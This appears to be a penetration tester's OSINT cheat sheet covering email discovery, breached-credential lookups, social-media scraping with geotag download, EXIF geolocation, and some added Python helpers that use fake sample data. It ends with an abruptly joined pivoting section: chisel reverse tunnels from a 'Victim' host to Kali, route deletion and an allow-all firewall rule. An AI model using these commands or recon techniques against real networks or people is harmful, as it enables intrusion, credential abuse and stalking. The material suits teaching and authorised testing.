
OSINT

MindMap for OSINT

- DNS Enum - Domain/Subdomain
- Check the Services/Applications Running
- Organization Details
- Organization Users
- Organization Job Profiles
- Google Dorks - Follow the Google Hacking Database
User Recon - Finding Emails

- Check for files hosted on the website, download them all and pull the metadata out of every file (author, creator, last-modified-by fields often name real users). Use ExifTool and strings
- PowerMeta can be used to gather those files and their metadata from a domain
- hunter.io - can be used to find email addresses available online, free for the first few searches
- Awesome tool for finding emails - Phonebook.cz
- voilanorbert.com - gives 50 free emails
- clearbit.com - Chrome extension
- Check whether an email address is valid or not - Verifalia.com / verifyemailaddress.org
- Find users from LinkedIn via BridgeKeeper
python bridgekeeper.py -c website.com
#a username-list generator can be used to build a wordlist from the names found: "git clone https://github.com/captain-noob/username-list-generator.git"

- Automated recon using SpiderFoot
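The two steps above (harvest author names from document metadata, then work out the address format the organization uses) can be chained. This is an added example, not code from the original post or from any of the tools it names: it takes the JSON that `exiftool -j` emits for a batch of downloaded files, counts the people named in the standard `Author`/`Creator`/`LastModifiedBy` tags while dropping software product names, and derives the usual corporate address candidates for a domain. The exiftool records and the `example.com` domain are constructed.

```python
"""Turn document metadata (exiftool -j output) into a list of probable users
and candidate corporate e-mail formats.  Added example; the exiftool JSON
below is constructed sample data, not real metadata."""
import json
import re
from collections import Counter

# Constructed sample of `exiftool -j *.pdf *.docx *.pptx` output (fake data).
SAMPLE_EXIFTOOL_JSON = """[
  {"SourceFile": "annual-report.pdf", "Author": "Jane Doe", "Creator": "Microsoft Word"},
  {"SourceFile": "brochure.docx", "Creator": "John Smith", "LastModifiedBy": "jsmith"},
  {"SourceFile": "slides.pptx", "Author": "Jane Doe", "LastModifiedBy": "Jane Doe"},
  {"SourceFile": "logo.png", "Software": "Adobe Photoshop"}
]"""

# Standard exiftool tag names that commonly hold a person's name or account.
NAME_FIELDS = ("Author", "Creator", "LastModifiedBy", "Artist", "Owner")
# Fragments that mark a value as a software product rather than a person.
SOFTWARE_HINTS = ("microsoft", "adobe", "libreoffice", "word", "photoshop", "acrobat")


def extract_names(exiftool_json):
    """Return a Counter of name -> number of files that name appeared in."""
    names = Counter()
    for record in json.loads(exiftool_json):
        seen = set()  # count each person once per file
        for field in NAME_FIELDS:
            value = record.get(field)
            if not value or any(h in value.lower() for h in SOFTWARE_HINTS):
                continue
            seen.add(value.strip())
        names.update(seen)
    return names


def email_candidates(name, domain):
    """Guess the common corporate address formats for a 'First Last' name.
    A single-token value (already a username) is used as-is."""
    parts = re.findall(r"[a-z]+", name.lower())
    if not parts:
        return []
    if len(parts) < 2:
        return [f"{parts[0]}@{domain}"]
    first, last = parts[0], parts[-1]
    return [f"{first}.{last}@{domain}", f"{first[0]}{last}@{domain}", f"{first}@{domain}"]


def report(exiftool_json, domain):
    """Map every person found in the metadata to their address candidates,
    most frequently seen names first."""
    counts = extract_names(exiftool_json)
    return {name: email_candidates(name, domain) for name, _ in counts.most_common()}


if __name__ == "__main__":
    for name, addresses in report(SAMPLE_EXIFTOOL_JSON, "example.com").items():
        print(f"{name}: {', '.join(addresses)}")
```

The candidate list is meant to be fed to the validators listed above (Verifalia and the like); from the defender's side, running this over your own public documents shows exactly what the metadata gives away, and which fields to scrub before publishing.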
Gathering Breached Credentials

- Use Heath Adams' breach-parse to find breached creds in a credential dump
- Haveibeenpwned.com - check whether the email is present in some breach
- Dehashed.com
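breach-parse is essentially a grep for the target domain over combo lists in `email:password` layout. The following is an added example (not the post's or breach-parse's code) that does the same filtering in Python over a constructed dump, normalises address case, skips malformed lines, and records a short hash of each secret instead of the plaintext so the result can go into an exposure report. The dump lines and domains are made up.

```python
"""Filter a combo-list style credential dump for one domain and report
masked secrets.  Added example; SAMPLE_DUMP is constructed fake data."""
import hashlib
import re
from collections import defaultdict

# Constructed sample dump in the common email:password layout (fake data).
SAMPLE_DUMP = """\
jane.doe@example.com:Summer2019!
JANE.DOE@example.com:Summer2019!
bob@other.org:hunter2
jsmith@example.com:Welcome1
malformed line without separator
jsmith@example.com:Welcome1
"""

# address, then a ':' or ';' separator, then whatever follows as the secret
EMAIL_RE = re.compile(r"^([^:;\s]+@[^:;\s]+)[:;](.*)$")


def fingerprint(secret):
    """Short SHA-256 prefix: lets the same leaked password be correlated
    across accounts without writing the plaintext into a report."""
    return hashlib.sha256(secret.encode()).hexdigest()[:12]


def parse_dump(text, domain):
    """Return {email: set(fingerprints)} for every address at `domain`."""
    hits = defaultdict(set)
    suffix = "@" + domain.lower()
    for line in text.splitlines():
        m = EMAIL_RE.match(line.strip())
        if not m:
            continue  # not an email:password record
        email, secret = m.group(1).lower(), m.group(2)
        if not email.endswith(suffix):
            continue
        hits[email].add(fingerprint(secret))
    return dict(hits)


def summarize(hits):
    """Counts for the report: affected accounts and distinct leaked secrets."""
    secrets = set().union(*hits.values()) if hits else set()
    return {"accounts": len(hits), "unique_secrets": len(secrets)}


if __name__ == "__main__":
    found = parse_dump(SAMPLE_DUMP, "example.com")
    for email, fps in sorted(found.items()):
        print(email, sorted(fps))
    print(summarize(found))
```

Duplicated lines (the same address in different case, the same record twice) collapse to one account with one fingerprint, which is what you want when counting how many users need a forced reset.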
Organization Technology Finder
#Similar to Wappalyzer but gives detailed information

https://builtwith.com/
Search Social Media Accounts of a User

git clone https://github.com/sherlock-project/sherlock.git
python3 sherlock username --timeout 1
Twitter OSINT 

https://github.com/twintproject/twint

pip3 install twint

twint -u username 
Instagram OSINT - Instaloader

https://github.com/instaloader/instaloader 

#Installation
pip3 install instaloader

#Usage
instaloader profile UserName

#Download geotags - might have to log in
instaloader -G UserName


Instagram OSINT - Osintgram
git clone https://github.com/Datalux/Osintgram.git
cd Osintgram
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

#update your creds in the credentials.ini file in the config folder

#Start Enum
python3 main.py TargetUserName
Finding Users/Locations with Images - Image Reverse Search

Use the Chrome extension Fake News Debunker by InVID: right-click on the image, select the extension and choose "Search All"

- This opens a new tab in the browser with reverse-image results for the selected image from all the supported search engines.
- You can also go to https://lens.google.com, upload an image and search for it
- If you want to add some text to the image search, right-click on the image and click "Scan with Google Lens"; there is an option to add text there
- You can also use Yandex Image Search
Image Reverse Search - EXIF/Location

# Find Latitude and Longitude
- On Windows, you can right-click on an image --> Properties --> Details --> GPS
- There are multiple online EXIF viewers as well
- Or use the Exif Viewer Pro Chrome extension: right-click on the image and select "Show EXIF Data"
- Or use an offline copy of ExifTool
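Every viewer listed above is doing the same conversion underneath: the GPS IFD stores each coordinate as three RATIONAL values (degrees, minutes, seconds) plus a hemisphere reference tag, and the decimal value you paste into Google Maps is deg + min/60 + sec/3600, negated for S or W. This added example (not from the post or from any of those tools) carries that conversion through on a constructed GPS IFD, using the standard tag numbers 1 to 4 (GPSLatitudeRef, GPSLatitude, GPSLongitudeRef, GPSLongitude); the rationals are given as (numerator, denominator) pairs as in the raw EXIF data, and the sample coordinates are made up.

```python
"""Convert an EXIF GPS IFD (tags 1-4) into decimal degrees.  Added example;
SAMPLE_GPS_IFD is constructed and its coordinates are not from any real
photo."""
from fractions import Fraction

# Standard EXIF GPS IFD tag numbers.
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 1, 2, 3, 4

# Constructed GPS IFD. Each coordinate is (degrees, minutes, seconds), stored
# as EXIF RATIONAL values, written here as (numerator, denominator) pairs.
SAMPLE_GPS_IFD = {
    GPS_LAT_REF: "N",
    GPS_LAT: ((48, 1), (51, 1), (2991, 100)),   # 48 deg 51' 29.91"
    GPS_LON_REF: "E",
    GPS_LON: ((2, 1), (17, 1), (4032, 100)),    # 2 deg 17' 40.32"
}


def _rational(value):
    """EXIF RATIONAL -> Fraction; accepts (num, den) pairs or plain numbers."""
    if isinstance(value, tuple):
        num, den = value
        if den == 0:  # malformed tag seen in the wild; treat as zero, don't crash
            return Fraction(0)
        return Fraction(num, den)
    return Fraction(value)


def dms_to_decimal(dms, ref):
    """deg + min/60 + sec/3600, negative for the southern/western hemisphere."""
    deg, minutes, seconds = (_rational(v) for v in dms)
    decimal = deg + minutes / 60 + seconds / 3600
    if ref in ("S", "W"):
        decimal = -decimal
    return float(decimal)


def gps_from_ifd(gps_ifd):
    """Return (lat, lon) rounded to 6 decimals (about 10 cm), or None when
    the tags are missing, unparsable or outside the valid range."""
    try:
        lat = dms_to_decimal(gps_ifd[GPS_LAT], gps_ifd.get(GPS_LAT_REF, "N"))
        lon = dms_to_decimal(gps_ifd[GPS_LON], gps_ifd.get(GPS_LON_REF, "E"))
    except (KeyError, ValueError, TypeError):
        return None
    if not (-90 <= lat <= 90 and -180 <= lon <= 180):
        return None
    return round(lat, 6), round(lon, 6)


def maps_url(coords):
    """Google Maps search link for a (lat, lon) pair."""
    lat, lon = coords
    return f"https://www.google.com/maps/search/?api=1&query={lat},{lon}"


if __name__ == "__main__":
    coords = gps_from_ifd(SAMPLE_GPS_IFD)
    print(coords, maps_url(coords) if coords else "no usable GPS data")
```

With Pillow installed the same dictionary comes straight from `Image.open(path).getexif().get_ifd(0x8825)`; the code above stays on the standard library so it runs anywhere. The range check matters because photos edited by some tools carry zeroed or garbage GPS tags, and a coordinate of (0, 0) off the coast of Africa is a classic false lead.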


# Youtube Metadata Viewer
go to https://mattw.io/youtube-metadata/ 


- First try to build a proper picture of the location you are looking for - search for it on Google and social media and look for any clues
- If it's a video, take multiple snapshots from different angles, stitch them into a proper panorama and use that as the source image
- Use Google Maps, Google Earth and Sentinel Hub (30-day free trial) - the last one has more timelines of satellite imagery, which can be used to pin down the exact date when something happened
Creating Satellite Image Timelapse

  • Go to the Sentinel Hub EO Browser and go to the location you are looking for by entering it in the search box
  • Click on the "Timeline" icon on the right side
  • Choose the timeframe and the number of frames and click download.
    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...